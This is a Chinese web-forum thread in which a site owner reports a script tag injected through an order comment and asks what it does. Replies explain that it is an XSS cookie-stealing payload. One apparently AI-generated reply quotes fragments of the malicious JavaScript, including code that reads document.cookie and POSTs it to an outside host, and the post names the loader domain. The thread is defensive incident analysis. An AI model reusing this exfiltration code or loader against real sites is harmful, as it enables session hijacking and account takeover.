·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

最近发现网站留言被注入的一段js

135 7
发表于 2024-8-7 09:35:00 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
  1. <防屏蔽sCRiPt/SrC=地址在下面被loc防火墙拦截了>
复制代码

有一天发现后台一个订单留言出现这玩意,能调用的地方两个,一个是订单列表,一个是订单详情。订单详情看了F12审查,没被运行,被转成字符串了。订单列表里的被运行了。还导致的后面订单都显示不出来。

求大佬看看这段代码是干嘛

xss.icu/jvcy
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论7

IT618发布Lv.8 发表于 2024-8-7 09:35:23 | 查看全部
主要就是偷你cookie 不難理解吧
我要说一句 收起回复
独家记忆Lv.8 发表于 2024-8-7 09:35:31 | 查看全部
该JavaScript文件中包含 `document.cookie` 代码。为了进一步确认和提供详细信息,我们需要定位并查看代码中使用 `document.cookie` 的上下文。接下来,我们将提取并查看包含 `document.cookie` 的相关代码片段。

在上传的 JavaScript 文件中,`document.cookie` 出现了三次。以下是每次出现的上下文:

1.
```javascript
probe_return_data['cookie'] = never_null(document.cookie);
```

2.
```javascript
try {
    return document.cookie
} catch(e) {
    return ''
```

3.
```javascript
try {
    return document.cookie
} catch(e) {
    return ''
```

这些代码段确实尝试访问 `document.cookie`。特别是第一个代码段,将 `document.cookie` 存储在 `probe_return_data['cookie']` 中,这可能是将你的 cookie 数据发送到某个地方。

如果这些代码没有经过审查或来自不可信来源,可能存在安全隐患。建议不要运行该 JavaScript 文件,并检查网站或应用的来源和信誉。
我要说一句 收起回复
浅生Lv.8 发表于 2024-8-7 09:36:05 | 查看全部
为了给出确切的证据,我们需要查看代码中是否有尝试发送 `document.cookie` 的操作,例如通过网络请求将其发送到外部服务器。

以下是一些常见的方式:

1. 使用 `XMLHttpRequest` 发送数据。
2. 使用 `fetch` 发送数据。
3. 动态创建 `img` 或 `script` 标签并设置 `src` 为包含 cookie 数据的 URL。

让我们在代码中查找这些模式。

在检查 JavaScript 代码时,发现了以下可疑的片段,它们可能用于窃取你的 cookie 信息并将其发送到外部服务器:

### 使用 `XMLHttpRequest` 发送数据
```javascript
function contact_mothership(probe_return_data) {
    if(gone) return;
    gone = 1;
    var http = new XMLHttpRequest();
    var url = "//www.xiaokel.cn/bdstatic.com/?callback=jsonp";
    http.open("POST", url, true);
    http.setRequestHeader("Content-type", "application/json");
    http.send(JSON.stringify(probe_return_data));
}
```
这个函数会创建一个 `XMLHttpRequest` 对象,并将 `probe_return_data` 发送到指定的 URL。这可能包括你的 cookie 数据,因为 `probe_return_data['cookie']` 被设置为 `document.cookie`。

### 动态创建图片元素发送数据
尽管在此代码中找到了多个创建 `Image` 元素的例子,但没有明确的证据表明它们用于发送 cookie 数据。然而,这是一种常见的技术,可以通过设置 `img.src` 为包含 cookie 数据的 URL 来窃取信息。

综合这些发现,可以合理推断这段代码确实可能在尝试窃取你的 cookie 信息,并通过 `XMLHttpRequest` 将其发送到外部服务器。具体的证据包括:

1. **`document.cookie` 被访问并存储在 `probe_return_data['cookie']` 中。**
2. **`contact_mothership` 函数会将 `probe_return_data` 发送到外部 URL。**

为了确保安全,建议立即移除或禁用该脚本,并检查服务器日志以确定是否有任何未经授权的数据传输。
我要说一句 收起回复
CrystαlLv.8 发表于 2024-8-7 09:36:28 | 查看全部
:lolgpt真省事嗷,建议自己问问chatgpt.com
我要说一句 收起回复
CrystαlLv.8 发表于 2024-8-7 09:36:57 | 查看全部
就是插入XSS代码,如果正常插入了,你触发了就会把你的COOKIE盗取,IP,网址后台地址,游览器UA等一系列信息
我要说一句 收起回复
TyCodingLv.8 发表于 2024-8-7 09:37:38 | 查看全部
zixi 发表于 2024-8-7 01:37
gpt真省事嗷,建议自己问问chatgpt.com
回家了懒得登录,最近有人账号被登录后台,原来是这个搞的鬼
我要说一句 收起回复
IT618发布Lv.8 发表于 2024-8-7 09:38:11 | 查看全部
whoamie 发表于 2024-8-7 02:16
就是插入XSS代码,如果正常插入了,你触发了就会把你的COOKIE盗取,IP,网址后台地址,游览器UA等一系列信 ...
感谢
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

图文热点
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.117.107.78,GMT+8, 2024-11-22 12:55 , Processed in 0.655208 second(s), 120 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表